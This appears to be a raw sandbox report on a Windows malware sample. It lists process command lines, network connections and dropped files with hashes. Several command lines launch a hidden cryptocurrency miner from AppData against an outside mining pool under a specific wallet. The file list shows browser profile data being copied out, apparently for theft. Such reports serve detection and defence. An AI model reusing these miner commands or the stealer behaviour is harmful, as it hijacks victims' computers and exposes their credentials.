C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe

C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe -a kawpow -o stratum+tcp://rvn.kryptex.network:7777 -u RHMTwiUaeDeo3EHxkhUGvvvjDeVXSAaY4H/LCRig -RUN -reboot-times 0

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C start /B /MIN C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe -a kawpow -o stratum+tcp://rvn.kryptex.network:7777 -u RHMTwiUaeDeo3EHxkhUGvvvjDeVXSAaY4H/LCRig

C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe

C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe -a kawpow -o stratum+tcp://rvn.kryptex.network:7777 -u RHMTwiUaeDeo3EHxkhUGvvvjDeVXSAaY4H/LCRig

C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe

C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe -a kawpow -o stratum+tcp://rvn.kryptex.network:7777 -u RHMTwiUaeDeo3EHxkhUGvvvjDeVXSAaY4H/LCRig -RUN -reboot-times 0

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C start /B /MIN C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe -a kawpow -o stratum+tcp://rvn.kryptex.network:7777 -u RHMTwiUaeDeo3EHxkhUGvvvjDeVXSAaY4H/LCRig

C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe

C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe -a kawpow -o stratum+tcp://rvn.kryptex.network:7777 -u RHMTwiUaeDeo3EHxkhUGvvvjDeVXSAaY4H/LCRig

C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe

C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe -a kawpow -o stratum+tcp://rvn.kryptex.network:7777 -u RHMTwiUaeDeo3EHxkhUGvvvjDeVXSAaY4H/LCRig -RUN -reboot-times 0

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C start /B /MIN C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe -a kawpow -o stratum+tcp://rvn.kryptex.network:7777 -u RHMTwiUaeDeo3EHxkhUGvvvjDeVXSAaY4H/LCRig

C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe

C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe -a kawpow -o stratum+tcp://rvn.kryptex.network:7777 -u RHMTwiUaeDeo3EHxkhUGvvvjDeVXSAaY4H/LCRig

C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe

C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe -a kawpow -o stratum+tcp://rvn.kryptex.network:7777 -u RHMTwiUaeDeo3EHxkhUGvvvjDeVXSAaY4H/LCRig -RUN -reboot-times 0

Network

Country Destination Domain Proto
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 172.67.146.76:443 textpubshiers.top tcp
US 8.8.8.8:53 accounts.server.lan udp
NL 142.250.179.196:443 www.google.com tcp
NL 142.250.179.196:443 www.google.com tcp
NL 142.250.179.196:443 www.google.com udp
NL 142.251.39.110:443 clients2.google.com udp
NL 142.251.39.110:443 clients2.google.com tcp
N/A 224.0.0.251:5353 udp
US 162.159.135.232:443 discord.com tcp
IE 34.252.239.71:80 checkip.amazonaws.com tcp
US 172.67.146.76:443 textpubshiers.top tcp
US 162.159.135.232:443 discord.com tcp
NL 142.250.179.196:443 www.google.com udp
NL 142.250.179.202:443 content-autofill.googleapis.com tcp
US 8.8.8.8:53 202.179.250.142.in-addr.arpa udp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 8.8.8.8:53 233.128.159.162.in-addr.arpa udp
US 8.8.8.8:53 ajax.googleapis.com udp
US 162.159.128.233:443 discord.com udp
US 8.8.8.8:53 global.localizecdn.com udp
NL 172.217.168.234:443 ajax.googleapis.com tcp
NL 172.217.168.234:443 ajax.googleapis.com tcp
GB 18.245.162.113:443 assets-global.website-files.com tcp
US 104.18.4.175:443 global.localizecdn.com tcp
GB 96.17.179.184:80 apps.identrust.com tcp
US 8.8.8.8:53 61.39.156.108.in-addr.arpa udp
US 8.8.8.8:53 184.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 179.178.17.96.in-addr.arpa udp
GB 18.245.246.167:443 d3e54v103j8qbb.cloudfront.net tcp
GB 52.84.90.29:443 assets.website-files.com tcp
GB 52.84.90.29:443 assets.website-files.com tcp
NL 142.250.179.202:443 content-autofill.googleapis.com udp
US 104.18.32.137:443 geolocation.onetrust.com tcp
US 192.178.49.3:443 beacons.gcp.gvt2.com tcp
NL 142.250.179.174:443 www.youtube.com tcp
US 35.190.80.1:443 a.nel.cloudflare.com tcp
US 8.8.8.8:53 1.80.190.35.in-addr.arpa udp
US 35.190.80.1:443 a.nel.cloudflare.com udp
US 8.8.8.8:53 190.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 162.159.128.233:443 discord.com udp
NL 172.217.168.234:443 ajax.googleapis.com udp
US 104.18.4.175:443 global.localizecdn.com udp
GB 52.84.90.29:443 assets.website-files.com tcp
US 8.8.8.8:53 beacons.gcp.gvt2.com udp
US 192.178.49.3:443 beacons.gcp.gvt2.com udp
US 8.8.8.8:53 discord.com udp
US 162.159.136.232:443 discord.com tcp
US 8.8.8.8:53 textpubshiers.top udp
US 172.67.146.76:443 textpubshiers.top tcp
US 162.159.133.234:443 remote-auth-gateway.discord.gg tcp
NL 142.250.179.202:443 content-autofill.googleapis.com udp
US 8.8.8.8:53 234.133.159.162.in-addr.arpa udp
US 8.8.8.8:53 lhr3.nbminer.com udp
US 162.159.128.233:443 discord.com udp
US 35.190.80.1:443 a.nel.cloudflare.com udp
US 104.19.218.90:443 newassets.hcaptcha.com tcp
US 8.8.8.8:53 90.218.19.104.in-addr.arpa udp
US 104.19.218.90:443 imgs3.hcaptcha.com udp
NL 142.250.179.202:443 content-autofill.googleapis.com udp
US 104.19.218.90:443 imgs3.hcaptcha.com tcp
US 104.19.218.90:443 imgs3.hcaptcha.com udp
US 104.19.218.90:443 imgs3.hcaptcha.com udp
US 162.159.128.233:443 discord.com udp
US 35.190.80.1:443 a.nel.cloudflare.com udp
US 8.8.8.8:53 gateway.discord.gg udp
US 162.159.135.234:443 gateway.discord.gg tcp
US 8.8.8.8:53 234.135.159.162.in-addr.arpa udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.128.233:443 status.discord.com tcp
US 8.8.8.8:53 233.129.159.162.in-addr.arpa udp
US 162.159.129.233:443 cdn.discordapp.com udp
US 162.159.129.233:443 cdn.discordapp.com udp
US 8.8.8.8:53 media.discordapp.net udp
US 162.159.130.232:443 media.discordapp.net tcp
US 162.159.130.232:443 media.discordapp.net tcp
US 8.8.8.8:53 232.130.159.162.in-addr.arpa udp
US 162.159.130.232:443 media.discordapp.net udp
US 162.159.136.232:443 status.discord.com tcp
US 8.8.8.8:53 accounts.server.lan udp
US 35.190.80.1:443 a.nel.cloudflare.com udp
US 35.190.80.1:443 a.nel.cloudflare.com udp
US 188.114.97.2:443 textpubshiers.top tcp
US 8.8.8.8:53 discord.com udp
US 162.159.128.233:443 discord.com udp
US 188.114.97.2:443 textpubshiers.top tcp
US 162.159.129.233:443 cdn.discordapp.com udp
US 8.8.8.8:53 lhr.nbminer.com udp
US 8.8.8.8:53 lhr3.nbminer.com udp
US 162.159.128.233:443 discord.com udp
US 8.8.8.8:53 textpubshiers.top udp
US 188.114.96.2:443 textpubshiers.top tcp
US 8.8.8.8:53 2.96.114.188.in-addr.arpa udp
US 188.114.96.2:443 textpubshiers.top tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 8.8.8.8:53 lhr3.nbminer.com udp
US 8.8.8.8:53 lhr.nbminer.com udp
US 104.21.79.145:443 textpubshiers.top tcp
US 162.159.136.232:443 discord.com tcp
US 104.21.79.145:443 textpubshiers.top tcp
US 8.8.8.8:53 textpubshiers.top udp
US 104.21.79.145:443 textpubshiers.top tcp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 lhr.nbminer.com udp
US 8.8.8.8:53 lhr3.nbminer.com udp
US 104.21.79.145:443 textpubshiers.top tcp
US 8.8.8.8:53 textpubshiers.top udp
US 172.67.146.76:443 textpubshiers.top tcp
US 8.8.8.8:53 discord.com udp
US 162.159.136.232:443 discord.com tcp

Files

memory/4256-0-0x0000000000DE0000-0x0000000000DEA000-memory.dmp

memory/4256-1-0x0000000074E00000-0x00000000755B1000-memory.dmp

memory/4256-2-0x0000000002970000-0x000000000298A000-memory.dmp

memory/4256-3-0x00000000050A0000-0x00000000050B0000-memory.dmp

memory/4256-4-0x0000000002930000-0x000000000293A000-memory.dmp

memory/4256-5-0x00000000050B0000-0x0000000005142000-memory.dmp

memory/4256-6-0x0000000005700000-0x0000000005CA6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\chinahalf1930182.vbs

MD5 a34267102c21aff46aecc85598924544
SHA1 77268af47c6a4b9c6be7f7487b2c9b233d49d435
SHA256 eba7ab5c248e46dbe70470b41ebf25a378b4eff9ce632adff927ac1f95583d44
SHA512 5d320312b93b46c9051a20c82d6405a3f2c78b23adb3ab3e71aad854b65b500937de7ca2986cf79967386d689beecccf676d89afde8ecc5d5ad0cb4ae2bf38a3

memory/4256-10-0x000000000AE00000-0x000000000BA00000-memory.dmp

memory/4256-11-0x0000000074E00000-0x00000000755B1000-memory.dmp

\??\pipe\crashpad_1632_MLXXGALHKIUTUFJK

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 66f302c6f044cf1e9652d58663109285
SHA1 aa26af134759bb587b8dc3e79e7c127e004a6576
SHA256 5d9bf5059382e04e7eb4f08dd8e8ae364ebf90fb1cd79ed5969a0d48a4f66d3b
SHA512 c17a6f666b749e4b7f1adb9df661d054179eb63074c9dfe18ca25e44a90b2a7515f86a0920db97113ace038e8de6010fa58cd8ffe2d296999cb0d1ac01656f82

memory/4256-26-0x00000000050A0000-0x00000000050B0000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json

MD5 99914b932bd37a50b983c5e7c90ae93b
SHA1 bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f
SHA256 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a
SHA512 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

memory/4256-35-0x0000000012B90000-0x0000000013832000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Costura\40BD99E3E2E3C109881E4ECA2DEDC617\32\sqlite.interop.dll

MD5 6f2fdecc48e7d72ca1eb7f17a97e59ad
SHA1 fcbc8c4403e5c8194ee69158d7e70ee7dbd4c056
SHA256 70e48ef5c14766f3601c97451b47859fddcbe7f237e1c5200cea8e7a7609d809
SHA512 fea98a3d6fff1497551dc6583dd92798dcac764070a350fd381e856105a6411c94effd4b189b7a32608ff610422b8dbd6d93393c5da99ee66d4569d45191dc8b

C:\Users\Admin\AppData\Local\Temp\ek3b4ofg.exe

MD5 e898826598a138f86f2aa80c0830707a
SHA1 1e912a5671f7786cc077f83146a0484e5a78729c
SHA256 df443ccf551470b3f9f7d92faf51b3b85ae206dd08da3b6390ce9a6039b7253a
SHA512 6827068b8580822ded1fb8447bdb038d0e00633f5ef7f480a8cdeaab6928ac23022a0b7a925058e0926ce9b41a6c8c22a5692e074621b2fccdb7edd29a0d4cfb

memory/3268-52-0x0000000001190000-0x0000000001198000-memory.dmp

memory/3268-53-0x00000000011B0000-0x00000000011B1000-memory.dmp

memory/3268-54-0x0000000001190000-0x0000000001198000-memory.dmp

memory/3268-56-0x0000000001190000-0x0000000001198000-memory.dmp

memory/3268-57-0x0000000001190000-0x0000000001198000-memory.dmp

memory/4256-63-0x0000000007AB0000-0x0000000007AC2000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 1b42c8a93186acdadfad2e252dac1506
SHA1 fdef0ff7e421939dbb05aaa90e9d5baaef3239d0
SHA256 c70d69ff2137436f88f3cd8a3ff9c4c415f04aa7b8d673c5dca6797c273a755a
SHA512 8938c2522c814b7ba47ce87e76956cd3f79acb3cc8c639384fb116d9f158cd585975c1abd9e9684aa2f1b8580f5d4917c735e2dd54bfa89685eaad8e0da36a17

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 0919e447f7d2bcde96e67fcaa475d35f
SHA1 0940feff0c3ae2ef6d56e8b03c6dd4c87f266994
SHA256 fb51fb2257adf488334d95b185f79291492b1bd91b65a84c9fa9edcc26f6363d
SHA512 19820ed08d5d809b16e87c3a6ec9d0a057c288d01fa9482edf52c139e75cfd677f9977a5b34fed665b9c54f5e080dc9ca0838c2fa74920299d3ec8d0fdd47a67

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 19c1d310a7a384d5c808568325968acb
SHA1 75226584e05ff5e62adfc56e784ae4096fa4d3cc
SHA256 5ee35fdd85ed117255ea5b7d2be6da2935c2e4a85cdb01114245744df1602d19
SHA512 208257a702964a03e75a84930d2f52fb673ab4cb3066d09a51a4e74bf2c82bfbe0e3f74025814a81b414759b29c582e6af0817e41b150bf9ebd0f8ca2df3db33

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 dbe935749eb4dd46697b5d0959363d7b
SHA1 5fb6be97471d2ca5896afdb4af9cd19b9b16ad23
SHA256 d77710bd4819b9f62821df00b27020ef041861faf718a28e738e19d77b47bf7b
SHA512 61ace212e4dace7f770817fd8cb9ac89f6dba57d15f3dd4ac859b8d6624d0a890956d5a1f4f49c059a027932f6ff863c5f0dc7dd0c73078946486a62077c6f39

memory/4256-96-0x00000000091E0000-0x0000000009246000-memory.dmp

memory/4256-97-0x0000000008BA0000-0x0000000008BAA000-memory.dmp

memory/4256-99-0x000000000E7F0000-0x000000000E7FA000-memory.dmp

memory/4256-98-0x00000000050A0000-0x00000000050B0000-memory.dmp

memory/4256-100-0x0000000009550000-0x000000000955C000-memory.dmp

memory/4256-101-0x0000000009570000-0x0000000009578000-memory.dmp

C:\Users\Admin\AppData\Roaming\Gongle\aWD0ANK9TA\vkmkrhdv.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite

MD5 5108c37b1d09c5aa39ea91359c62d0f4
SHA1 d3f16333dc64db49cc04f377f16d5a4f2f764bbd
SHA256 6cb876d82cc82571016d80f9a92fc1a528829b1c254ce028519dbb76ca7b191f
SHA512 147d93bcf38ac98a9a5252ca4fcf54903f6ccd30bf43ef6ce96bd04fe7a25badff0716cb5179cb118db73e27efc3a07f724ccf935b502702e163190a4f1ffc53

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 073d30ecbf6659a136bd1fd8f16374cd
SHA1 8aa4c4b8cdc0e94978b5dfb80bc0e1cb302501a2
SHA256 34f166e239a5d01ad60dd55ecaa071786e6f50c0cf24ca6b21c730884878dbc5
SHA512 e43cf256d1f0888d8b2f9a86c2cf22866e565be221562b2642f3c76ce2a1638558463321663e0f861b3b13a4146ee9fb44e101a8a3b08eccac73ca11722aa890

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG

MD5 019e86fe90c6564dba41e983aa37ca4c
SHA1 03c17ddac8bc67a8c8668016a327798f76655c31
SHA256 ba651a15a3e58ef071216280649a36ed0ac6b8396607232d701c5d8f00cc1b7a
SHA512 65f5bb044d3d4b7ca2dcafdfd60c688394d8c5f1020c5e0e7d0f455d6af76b3516283492b777784a1b68111739da6e0f264e897f42c9ba12f5f3b83f04c2e998

C:\Users\Admin\AppData\Roaming\Gongle\a45BDWJVJE\MANIFEST-000001

MD5 5af87dfd673ba2115e2fcf5cfdb727ab
SHA1 d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256 f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512 de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

C:\Users\Admin\AppData\Roaming\Gongle\a45BDWJVJE\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Roaming\Gongle\a45BDWJVJE\LOG.old

MD5 3ecd9a471398ab179d78d129e408c9e2
SHA1 2144351de619a0c249d93d5fe8791c59d8412f57
SHA256 9b4a6980e0b910c9a71634b68c5a7f7dba587fc132de2b1adb584967c757d7e8
SHA512 65fda27128c4c8debe150adb05d766f653c0b4efd19da77ec76a24872be9e44233bff068952f1271dcef41b7cb2590625211a6304656587c6f72586040e55f39

C:\Users\Admin\AppData\Roaming\Gongle\a8JR428U61\LOG

MD5 5dd5766a8f631a86b7d57745cc510212
SHA1 cc746585aadabbdaa5291c0552018f0fa9e5bba7
SHA256 90c33060f528f16646238e24a4d5744caac2f6ddc7e6717ae89b50ab25915c4d
SHA512 a4338bc262727f92632d9415e1963f40ecd78dc857bb4cddcd83c31ba89c1e56809eaa726af8a791419118d11df844ba9f744b57871921cbd615244ad102276f

C:\Users\Admin\AppData\Roaming\Gongle\a8JR428U61\LOG.old

MD5 efcbd05e0ec7859084c42a001bcb951b
SHA1 96e5b5b49cc5dc8ce5f94d680b5ae92cc1e4a68e
SHA256 4cb1ccc56e4bf28dbb1e57de28a15c728657904776138c4086cace601ed8eb9d
SHA512 d24537d8c75eb6937b54de8f841b6f9874ce6a6f981911ff186d616af809a830c0d3f93be7b852bbb76dbc273292ba672db1e2d7c92d6a1154e41d5269d97b79

memory/4256-239-0x0000000006880000-0x0000000006932000-memory.dmp

memory/4256-240-0x0000000006990000-0x00000000069B2000-memory.dmp

memory/4256-241-0x000000000A260000-0x000000000A2D6000-memory.dmp

memory/4256-242-0x000000000A210000-0x000000000A22E000-memory.dmp

memory/4256-243-0x000000000A330000-0x000000000A380000-memory.dmp

memory/4256-244-0x000000000A380000-0x000000000A3EA000-memory.dmp

memory/4256-245-0x000000000D070000-0x000000000D3C7000-memory.dmp

memory/4256-246-0x000000000A3F0000-0x000000000A43C000-memory.dmp

memory/4256-250-0x000000000A4B0000-0x000000000A4EC000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 5ab5fa4a8a17d30e8d95f26c04ce2bae
SHA1 bcdc2220525485779df7d77da0a4e41aabfc99bb
SHA256 8143664c60350efdf75f785747619df5a320f120c9022bcaed1996ac78511612
SHA512 55d58ea486c8aa85796e1efb867aa8352078954bd78c63cbf0c85e26c42e03959e0117473dc8fe6172d2b7497744830b47660bcdc55d5dcd1993ed1a0bba7d60

memory/4256-251-0x000000000A470000-0x000000000A491000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\d3ea32d805aa4a29b0f479b4b7feaef6

MD5 02d2c46697e3714e49f46b680b9a6b83
SHA1 84f98b56d49f01e9b6b76a4e21accf64fd319140
SHA256 522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9
SHA512 60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

memory/4256-266-0x000000000A540000-0x000000000A54A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\b43a5319e06b4a15b86a5d10eb7c2039

MD5 fc7a4d41892d82974350181b3c1f2906
SHA1 748d358d9d3561979fad840ff7300e9cfa2c3a1a
SHA256 df3e705d3a62d4294d519210fbb68f75f807836fd42de4b5996b6949d119c988
SHA512 a83e4b85d66052a6b8a22a9f1b22878d9e86c515b4c8d5013ca6d766325bc7d78f4d62830d0fbc5c38e76c7dfd2a9ce35b001a6809e49ea771c2db97d3aaf1f6

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000001

MD5 f5b4137b040ec6bd884feee514f7c176
SHA1 7897677377a9ced759be35a66fdee34b391ab0ff
SHA256 845aa24ba38524f33f097b0d9bae7d9112b01fa35c443be5ec1f7b0da23513e6
SHA512 813b764a5650e4e3d1574172dd5d6a26f72c0ba5c8af7b0d676c62bc1b245e4563952bf33663bffc02089127b76a67f9977b0a8f18eaef22d9b4aa3abaaa7c40

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 74502f90ba9e5deefca887278ffbe247
SHA1 a6dc5d82ccd6ad39ad0f822449bdb0191e4db707
SHA256 e81bdf7f8f1c2447368dc6c0626022f2a509d6f96bcc92c13bc5606b28b7dd4c
SHA512 ea1495b92b7d8bea24ae945c16f355fb6725a2cff6869a2e26f9da0ad5f299cdb9e70a1257762bb77eb5c719b6cdcd69d3202b047507afabd4e4b9b6e8abb955

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 5522ba39b1c608fbde54606c3dc6ad4c
SHA1 9df62ace1c07dbbe88eda8ca41507ce662424901
SHA256 f11d6cb68f82b73fe9a5d172265c4419bc5eca853afe42dd1649235a1f91d37c
SHA512 68fab4686cec178531c7eb1100a7e240b035bc72f73c947eff335ec427383fe480143bbf676130df6e1a1a8d4e7b3adc6b6d80a1349de632c7d51913d33abf2b

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 4c35dae9e0fd4130f300b141b8e035b4
SHA1 507ca5865f0c8b6c599a5a7fd4bf65b1ce729285
SHA256 7c574762c3a45e8a68a18f4c629e8f2113f52ab7171ce079faef295354eeea2b
SHA512 5d28aefb1ad2f645df0b02173c238b135d68120c0c42af08a9d831572ec3f0370238498fb9d7db9ccf5df32f46e8661768dd649496fe6cac7a1eda7019e013a3

memory/4256-407-0x00000000050A0000-0x00000000050B0000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 16e8e28f0543ad567304c7ce3f7925e2
SHA1 6fa8412f4fb5d78b629f53e3180be7795b8dba4c
SHA256 5112607c25b3d074eb8214bd56c20d4548fb942861f34ef5536d3c2b3d27702d
SHA512 bf03e75c47a0996b893d933f70ee15a86a9961ce52a58203eeafbcf6a02763865186e12c4d85c36a7f4f02564d5057761a3084c0be1d29876b2f68b278d4c0ba

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 382f5e8c8464445d106f9b6aeb023e43
SHA1 3462c7e5706bf164b3ff152c8e79b52b6ac20827
SHA256 b2f0e68f9d954fcafa72bfe7cd82878d00c2852089b20f01e10b1c8a7c7a463b
SHA512 5f83cc837aff6958e5914a10fc699753dcd115523549c890d5e73f2c79bd64ae27b92ee174fa7278823268ce9bac16b1bb7571be1472f54946060bcbfdd1c5b6

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 e17d1242114a80cdf400e5b1635cab96
SHA1 2eae3c5b3a01dbe9996f7031b5071bc6b014cbcc
SHA256 b33cdaab5134b78b09d191a8bc0f687c0db4c8c0526635cdb79a89166469e534
SHA512 6925f9b1a4034ea45795071570ba6ac5df15198b8cbf3727b04d3f4b6718e8a12e8581c4c115fb4ebd6f5f4f684c321adc78afb2e1612c82ae03b195995efd8d

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

MD5 7fea65a17bccc69601fd8417237921b5
SHA1 afbcde3e0dff69d465e2968dbc3eff19093f9a61
SHA256 fbffb68b6966ecd976bcb64c5aa105c02854c673977f19feedd46fdfd4e94176
SHA512 5048b37e7d7042904d6454205c7881d2f55c00e21fe7f2a3bf786556cef419f34aebe65137777f37916fa7a95f68add506f907dfc0c5dc592057188d34147b37

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe590824.TMP

MD5 e83dedb59a937d84d974b179a8121f26
SHA1 c38411d0b105b31196f920170847ff18a259c36c
SHA256 60ce2d6e76da28d8667374cc14845843179a0b34ec08634541cf1828e431bad0
SHA512 613360345becc9a74b5987b3f72fb0ff76bfdd13ff476dbacc465210cf4c9c2bf9df5366263a30f4e4ea129aa872b32692e6de753cf7bea2a0a66b0d08429979

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 35cfcefef2068d4e8646bd16fd78519b
SHA1 46982d0160762e6a7de5faa62d42d3568db35853
SHA256 68a148f10124a93604ae4f798b3b2821727691141260040a96003675e59b1268
SHA512 0e8f95b41d44811d7d31cc9ce9a543e8cf79a1148a8f21f0c5c5e05e6d5269360ffc083a36e273a7b4c2e4d6a88c28f4bdc4258c2f96d411a9f34239d2fd6659

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 08a22941465e1b9926f78b3dc587c49f
SHA1 85463e5d85d8b4015226ad1fdd77aa5a7268e084
SHA256 6c10c329beca461978a90977a6f70bd6ee976d22cfc2c3d1c20c48d34ba92209
SHA512 eefb9e9c08165a1bf0f5f3ddcb599daef8666d0209a8a6a928db4bba752722113028a36dcc65242c1da6bba9cca60bd41b32f4481706f7c680fce9e60ba48012

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 02232634980e13d0a2e302b91cf36b0b
SHA1 2c771bddafe92e0893703dbd7492cb23d04edb10
SHA256 caf596f2a9cdc904b8d4fba461cbacb13666dd5c34405e8271a517e1231ae41e
SHA512 5e4a7047019233c717ce5ece61e6a9af11e393230dff2a3788be52e8104e13ab5411b452b036679123083b758361d0e7358e39208c947eed80a25678d061ffcb

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 314498d5f347163bf00a69b4b8bdb59f
SHA1 ac564c9fa8907586eca4d4488597ac6317e9f0a6
SHA256 68fa0855e4bce10843d9c85875907be6d07f18053949dc0cf884f84b287f04a2
SHA512 fe53d1d6b048822182f3c618ad0eb85416a2644ead19b2e63504df08125436bb96acd2093649d581d4a1ac2a630be1cc04119bc7456c89ed7a0b64212542025a

C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe

MD5 b7382e3aa79d4bc7038198d1e2080efd
SHA1 a1d65873c543ba5a2faec3a3413190142592b10f
SHA256 87dfd9a9c53b58144bf51ad5c76b279a24ff2299940387dba9d2bc5614be885c
SHA512 336968451a9b7d214793950809dbb4fca521ac2d7836668b44386b5b81495c689589de9f71020cff83f64262369847619b082b88de1b1500611f43b3c9b9ff02

C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe

MD5 f224d8f7a0b1fac136ea8a0de24380c9
SHA1 0dbe97ee8850545d9ee70b1c930858acc354e1d0
SHA256 228041de134be9721decf6817f9f646159e6d7867021e91f11dc2724ef57ff60
SHA512 8b25425f68560707a3df55719412dc5c67c4734f6e8cdf0554f56bf52e5cab256f47477fc68c2f1098d52c938c020f3c6f789a0e448d507d7222c9511695ecd8

memory/2372-678-0x00007FFB3DA10000-0x00007FFB3DA12000-memory.dmp

memory/2372-680-0x0000000140000000-0x0000000141B2E000-memory.dmp

memory/2372-679-0x00007FFB3DA20000-0x00007FFB3DA22000-memory.dmp

memory/2372-681-0x0000000140000000-0x0000000141B2E000-memory.dmp

C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe

MD5 a991df724f63448f1f842859ef2af061
SHA1 8e862a6086c4556b9a6aaf12ed0a49a936248dea
SHA256 116d8806e31d0366655493911b4a6610666860ed60a8496c06961e92d3d42b34
SHA512 df198732b459822d70923bf75193efa3c7499355a1000b6a085c69fbd11c79956f2dab1c4ccbf4f70b548755f113bf2ebb6d4f09a87577db9d04b28ab37ce981

memory/2536-690-0x0000000140000000-0x0000000141B2E000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 90d13556c4baedc747b7f1dbe61f2202
SHA1 45fc1cd824a15b3a1d3a0441df5fd6294542b8c9
SHA256 0ff3394908bb3756ebd2d96b90afd056e48069f09dcee944675895e74d498614
